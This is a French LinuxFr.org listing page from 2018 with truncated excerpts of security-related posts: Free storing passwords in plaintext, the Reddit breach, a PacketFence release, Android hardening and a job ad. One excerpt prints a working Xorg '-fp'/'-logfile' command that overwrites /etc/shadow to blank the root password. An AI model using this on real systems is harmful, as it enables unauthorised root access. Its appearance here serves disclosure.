Journal Sécurité, Liberté, Education, Formation :

Posté par  . Licence CC By‑SA.
Étiquettes :
13
5
déc.
2018

« L’exigence de Sécurité dont nul ne peut contester le bien fondé est, comme souvent, sujet aux dévoiements habituels. D’objectif elle devient prétexte. Prétexte à sévérité, autoritarisme. Prétexte à « renforcement ». On renforce la réglementation, les clôtures, les limitations, les chicanes, les dos d’âne, les restrictions, les contraintes, les interdits. Mais les interdits excessifs sont des incitations à négliger tous les interdits : ils sont dangereux. Les contraintes non justifiées provoquent des réactions de défense : on triche ou (…)

Forum général.général Les tags populaires de LinuxFR dans le pied de page

Posté par  (site web personnel, Mastodon) . Licence CC By‑SA.
Étiquettes :
10
14
nov.
2018

Dans le pied de page de LinuxFR, on trouve une section « Tags populaires ». Pourquoi pas, mais la liste des tags que je vois à l'heure où j'écris ces lignes est :

  • banque
  • crédit
  • spam
  • prêt
  • offre
  • prêter
  • maemo
  • sécurité
  • l'argent
  • immobilier
  • python
  • avancé

J'ai l'impression que ça n'est pas très représentatif du véritable contenu du site :p

Je ne sais pas si c'est représentatif des vrais tag (alors c'est un problème de modération) ou non (auquel cas c'est (…)

Forum général.petites-annonces DRI recrute 4 profils en télétravail

Posté par  . Licence CC By‑SA.
Étiquettes :
5
5
nov.
2018

Tout d'abord, longue vie à ce forum !
Grâce à lui, on a rencontré Alex qui a intégré les équipes DRI en télétravail comme adminsys, du bonheur !
Nous avions aussi posté en mai une annonce pour un dev et nous sommes finalement tombés (en dehors du forum sur un salon, le physique cela a du bon…) sur un super jeune en contrat d'apprentissage pour un bac +4.

Je poste donc nos nouvelles recherches pour intégrer l'équipe technique de DRI (…)

PacketFence version 8.2 est disponible

Posté par  (site web personnel) . Édité par bubar🦥, Davy Defaud et Benoît Sibaud. Modéré par bubar🦥. Licence CC By‑SA.
Étiquettes :
21
12
nov.
2018
Sécurité

Inverse annonce la sortie de la version 8.2 de PacketFence. PacketFence est une solution de conformité réseau (NAC) entièrement libre (GPL v2), supportée et reconnue. Procurant une liste impressionnante de fonctionnalités, telles un portail captif pour l’enregistrement ou la remédiation, une gestion centralisée des réseaux filaires et sans fil, le prise en charge du 802.1X, l’isolation niveau 2 des composantes identifiées comme problématiques, l’intégration aux détecteurs d’intrusions tels Snort et Suricata, la reconnaissance d’appareils avec Fingerbank et plus encore.

PacketFence peut être utilisé pour sécuriser efficacement aussi bien des réseaux de petite taille que de très grands réseaux hétérogènes.

Bien qu’étant une version « mineure », cette version 8.2 est une mise à jour importante, qui apporte de nombreux ajouts et de nombreuses améliorations, listés dans la suite de cette dépêche.

Logo de PacketFence

Journal La faille grosse comme une maison

Posté par  (Mastodon) . Licence CC By‑SA.
Étiquettes :
26
26
oct.
2018

[Dev@localhost ~]$ id

uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow

----------. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow

cat: shadow: Permission denied

[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)

Journal Freenaute, ton mot de passe d'abonné est stocké en clair chez Free

Posté par  (site web personnel) . Licence CC By‑SA.
Étiquettes :
38
6
août
2018

Bienvenue en 2018,

Année de la mise en application du RGPD.
Année de la maturité en cybersécurité ? Pas pour tout le monde en tous cas.

Mon expérience d'hier soir m'a laissé perplexe. Sur la page de connexion des abonnés Freebox, ayant perdu mon mot de passe, j'ai renseigné les champs me permettant de le récupérer et … surprise, je l'ai récupéré … en clair par mail.

Nous sommes en 2018 et Free stocke les mots de passe de ses (…)

Utiliser son Android de façon plus sécurisée

Posté par  . Édité par ZeroHeure, BAud, Davy Defaud, Yves Bourguignon, jcr83, Nils Ratusznik, palm123, Anonyme et Pierre Jarillon. Modéré par ZeroHeure. Licence CC By‑SA.
Étiquettes :
22
9
juin
2018
Android

Android, le système d’exploitation largement majoritaire sur les mobiles, est, comme chacun le sait sur LinuxFr.org, construit sur un noyau Linux.

Linux étant sous licence GPL, tout peut vous sembler parfait, mais en réalité la couche applicative Android est beaucoup moins amicale que son noyau Linux.

Le but de cet article est de vous expliquer le fonctionnement d’Android, de vous faire découvrir sa face cachée et de vous expliquer comment vivre avec dans les meilleures conditions possibles.

Journal Reddit a subi une attaque informatique

Posté par  . Licence CC By‑SA.
Étiquettes :
20
12
août
2018

Rien de grande ampleur cela dit, qu’on se rassure, ce super site web de partage de liens qu’est Reddit est toujours en vie !

C’était il y a deux semaines environ. L’attaque a consisté en l’interception de SMS. Reddit recommande donc de passer à l’authentification 2FA qui utilise un jeton (à la place du SMS).

Toutes les données de 2007 et antérieures ont fuitées, mais les mots de passe sont hashés et salés (ce qui veut dire si je (…)